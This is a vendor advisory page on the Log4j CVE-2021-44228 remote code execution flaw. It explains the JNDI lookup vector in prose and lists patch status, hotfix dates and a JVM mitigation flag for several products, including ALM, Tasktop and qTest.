The Log4j team has been made aware of a security vulnerability, CVE-2021-44228, that has been addressed in Log4j 2.12.2 and Log4j 2.16.0.
Log4j’s JNDI support has not restricted what names could be resolved. Some protocols are unsafe or can allow remote code execution.
One vector that allowed exposure to this vulnerability was Log4j’s allowance of Lookups to appear in log messages. This meant that when user input is logged, and that user input contained a JNDI Lookup pointing to a malicious server, then Log4j would resolve that JNDI Lookup, connect to that server, and potentially download serialized Java code from that remote server. This in turn could execute any code during deserialization. This is known as a RCE (Remote Code Execution) attack.
MicroFocus Application Lifecycle Management (ALM)
15.5.0 and later
|Fix applied 12/18/2021|
4.4.1 and earlier
Hotfix available for:
HF8 Fix applied 01/10/2022
19.4.0 and later
Fixed Tasktop versions:
Note: This fix will be applied to all Tasktop versions later than the versions listed above.
10.5.3 and earlier
JVM option 3.7k -Dlog4j2.formatMsgNoLookups=true
qTest Patch should be available on 12/20
|Elasticsearch Fix applied 12/18/2021|
Elasticsearch Fix: https://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476
qTest 10.5.3 and earlier include a version of the Elasticsearch REST client (7.6.2) libraries that contain the log4j vulnerability.